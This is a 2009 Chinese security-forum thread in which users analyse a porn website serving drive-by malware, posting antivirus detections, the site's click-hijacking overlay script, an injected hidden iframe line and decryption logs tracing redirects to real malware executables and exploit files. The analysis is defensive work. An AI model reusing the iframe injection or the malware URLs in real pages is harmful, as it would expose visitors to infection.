查看: 13860|回复: 10
收起左侧

[已鉴定] http://888.67sese.com/(sex网站)[挂马][已检测by gtyre1]

[复制链接]
悠柚
发表于 2009-5-17 18:34:29 | 显示全部楼层 |阅读模式
[2009-05-17 18:33:41] 发现iexplore.exe试图触发数字签名漏洞,已被成功阻止!

[ 本帖最后由 gtyre1 于 2009-5-17 19:59 编辑 ]
悠柚
 楼主| 发表于 2009-5-17 18:35:41 | 显示全部楼层
威胁报告

已发现威胁总数: 9

Small-whitebg-red         病毒 (这是什么?)

已发现威胁: 9
这是完整列表:
威胁名称:         Downloader
位置:         http://888.67sese.com/html/bt/list18_17.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/wuxia/list25_1.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/bt/40999.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/chang/list26_1.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/bt/list18_1.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/bt/41002.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/taotu/list10_1.html

       
威胁名称:         直接链接到 Downloader
位置:         http://888.67sese.com/html/bt/list18_19.html

       
威胁名称:         直接链接到 Downloader
位置:         http://888.67sese.com/html/bt/40999.html
gtyre1
发表于 2009-5-17 19:15:51 | 显示全部楼层
貌似网马在

http://888.67sese.com/hao.js


不过我用freshow解不了
貌似是判断cookie的

var Then = new Date();
Then.setTime(Then.getTime() + 12*60*60*1000 ); //秒分
var cookieString = new String(document.cookie);
var cookieHeader = "LpageTJ" ;
var beginPosition = cookieString.indexOf(cookieHeader);
if (beginPosition == -1)
{
        var newtop=0
        var newleft=0
        if (navigator.appName == "Netscape") {
                layerStyleRef="layer.";
                layerRef="document.layers";
                styleSwitch="";
        }
        else {
                layerStyleRef="layer.style.";
                layerRef="document.all";
                styleSwitch=".style";

        }
        var autoclick_ok=false;
        function toExit(){
                autoclick_ok=true;
                document.cookie = "Cookie9=LpageTJ;expires="+ Then.toGMTString() +";path=/";
    }

        function doMouseMove() {

                layerName = 'iit'
                eval('var curElement='+layerRef+'["'+layerName+'"]')
                eval(layerRef+'["'+layerName+'"]'+styleSwitch+'.visibility="hidden"')
               
                if(!autoclick_ok) {
                        eval('curElement'+styleSwitch+'.visibility="visible"')
                }else{
                        eval('curElement'+styleSwitch+'.visibility="hidden"')
                }
               
                eval('newleft=document.body.clientWidth-curElement'+styleSwitch+'.pixelWidth')
                eval('newtop=document.body.clientHeight-curElement'+styleSwitch+'.pixelHeight')
                eval('height=curElement'+styleSwitch+'.height')
                eval('width=curElement'+styleSwitch+'.width')
                width=parseInt(width)
                height=parseInt(height)
                if (event.clientX > (document.body.clientWidth - 10 - width))
                {
                newleft=document.body.clientWidth + document.body.scrollLeft - 10 - width
                }
                else
                {
                newleft=document.body.scrollLeft + event.clientX-10
                }
                eval('curElement'+styleSwitch+'.pixelLeft=newleft')

                if (event.clientY > (document.body.clientHeight - 5 - height))
                {
                newtop=document.body.clientHeight + document.body.scrollTop - 5 - height
                }
                else
                {
                newtop=document.body.scrollTop + event.clientY-10
                }
                eval('curElement'+styleSwitch+'.pixelTop=newtop')
        }

        document.onmousemove = doMouseMove;
        if (navigator.appName == "Netscape") {

        }
        else
        {
                document.write('<div id="outerdiv">')
                document.write('<a href="http://67.159.24.46/link/click.php?fromid=25761" target="_blank"><img ID=iit src="click.gif"  style="position:absolute;top:0pt;left:0pt;z-index:99;visibility:hidden;" border="0" onclick="toExit()"></a>')
                document.write('</div>')
        }
}
xiaoqiang305
发表于 2009-5-17 19:26:06 | 显示全部楼层
他这里边得挨个网页去找的用freshow过滤不好使 实在是太费劲了,
抓了两个就不想抓了 。。。费劲 我在这里抓的<a target="_blank" href="http://a.46se.com/html/pic/list1_1.html">点击进入就去色色综合图区&nbsp;</a></font></strong></p>
黄网太可拍了
Log is generated by FreShow.
                    [object]http://com12l.3322.org/web/ActiveX.exe
                            [object]http://5l2o8.com/web/xp.css
pingfan5888
发表于 2009-5-17 19:30:19 | 显示全部楼层
888.67sese.com/end.js

<iframe src=http:\/\/kuaile4444.3322.org\/a\/a1.htm?4 width=100 height=0><\/iframe>
gtyre1
发表于 2009-5-17 19:49:35 | 显示全部楼层
关于:hxxp://888.67sese.com/解密的日志(全体输出 -  26):

Level  1>http://wo.40sese.com  
Level  2>http://a.46se.com/html/pic/list1_1.html
Level  3>http://a.46se.com/skin/default/end.js
Level  4>http://kuaile4444.3322.org/a/163.htm
Level  5>http://kuaile4444.3322.org/a/js.js
Level  6>http://kuaile4444.3322.org/a/ggbb.htm
Level  7>http://kuaile4444.3322.org/a/ggff.js
Level  7>http://kuaile4444.3322.org/a/ggff1.js
Level  8>http://5l2o8.com/web/xp.css  ●
Level  6>http://kuaile4444.3322.org/a/ggvod.htm
Level  7>http://kuaile4444.3322.org/a/ggvod.js
Level  8>http://5l2o8.com/web/xp.css  ●
Level  6>http://kuaile4444.3322.org/a/ggff.htm
Level  7>http://kuaile4444.3322.org/a/ff.js
Level  8>http://5l2o8.com/web/xp.css  ●
Level  6>http://kuaile4444.3322.org/a/ggfl.htm
Level  7>http://kuaile4444.3322.org/a/2222222222.swf  ●
Level  7>http://kuaile4444.3322.org/a/1111111111.swf  ●
Level  7>http://kuaile4444.3322.org/a/1111111111.swf  ●
Level  6>http://kuaile4444.3322.org/a/gg14.htm
Level  7>http://kuaile4444.3322.org/a/16.js
Level  7>http://kuaile4444.3322.org/a/15.js
Level  7>http://kuaile4444.3322.org/a/14.js
Level  8>http://5l2o8.com/web/xp.css  ●
Level  5>http://kuaile4444.3322.org/a/ggqm.htm
Level  6>http://com12l.3322.org/web/activex.exe  ●

日志由 Redoce1.9第46次修正版于 2009-5-17 19:47:45 生成。

(以上打点均为网马真实地址SWF除外)
[/quote]

[ 本帖最后由 gtyre1 于 2009-5-17 19:51 编辑 ]
mouse_0232
发表于 2009-5-17 20:02:27 | 显示全部楼层
关于:hxxp://888.67sese.com/解密的日志(全体输出 -  27):

Level  1>http://a.46se.com/html/pic/list1_1.html
Level  2>http://a.46se.com/skin/default/end.js
Level  3>http://kuaile4444.3322.org/a/a1.htm?4
Level  4>http://kuaile4444.3322.org/a/163.htm
Level  5>http://kuaile4444.3322.org/a/js.js
Level  6>http://kuaile4444.3322.org/a/ggr.htm
Level  6>http://kuaile4444.3322.org/a/ggbb.htm
Level  7>http://kuaile4444.3322.org/a/ggff.js
Level  7>http://kuaile4444.3322.org/a/ggff1.js
Level  8>http://5l2o8.com/web/xp.css
Level  6>http://kuaile4444.3322.org/a/ytxxz.htm
Level  6>http://kuaile4444.3322.org/a/ggvod.htm
Level  7>http://kuaile4444.3322.org/a/ggvod.js
Level  6>http://kuaile4444.3322.org/a/ggff.htm
Level  7>http://kuaile4444.3322.org/a/ff.js
Level  8>http://5l2o8.com/web/xp.css
Level  6>http://kuaile4444.3322.org/a/ggfl.htm
Level  7>http://kuaile4444.3322.org/a/2222222222.swf
Level  7>http://kuaile4444.3322.org/a/1111111111.swf
Level  7>http://kuaile4444.3322.org/a/1111111111.swf
Level  6>http://kuaile4444.3322.org/a/gg14.htm
Level  7>http://kuaile4444.3322.org/a/16.js
Level  7>http://kuaile4444.3322.org/a/15.js
Level  7>http://kuaile4444.3322.org/a/14.js
Level  8>http://5l2o8.com/web/xp.css
Level  5>http://kuaile4444.3322.org/a/ggqm.htm
Level  6>http://com12l.3322.org/web/activex.exe

此网址由幸福的耗子解密(本人博客www.mouse0232.com)
Sherry.ai
发表于 2009-5-17 20:25:17 | 显示全部楼层
不容易....这次不是OK.exe
knifed
发表于 2009-5-17 22:26:51 | 显示全部楼层
Log is generated by FreShow.
[wide]http://a.46se.com/html/pic/list1_1.html
    [script]http://a.46se.com/skin/default/top.js
    [script]http://a.46se.com/skin/default/end.js
        [frame]http://kuaile4444.3322.org/a/a1.htm?4
            [frame]http://kuaile4444.3322.org/a/163.htm
                [script]http://kuaile4444.3322.org/a/js.js
                    [frame]http://kuaile4444.3322.org/a/14.htm
                    [frame]http://kuaile4444.3322.org/a/c.htm
                    [frame]http://kuaile4444.3322.org/a/e.htm
                        [script]http://kuaile4444.3322.org/a/do.css
                        [script]http://kuaile4444.3322.org/a/e.css
                        [object]http://5l2o8.com/web/13.exe
    [script]http://s26.cnzz.com/stat.php?id=1013994&web_id=1013994
jhtl
发表于 2009-5-18 12:58:10 | 显示全部楼层
网站不错,就是图片好多打不开。。。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 17:34 , Processed in 0.128255 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表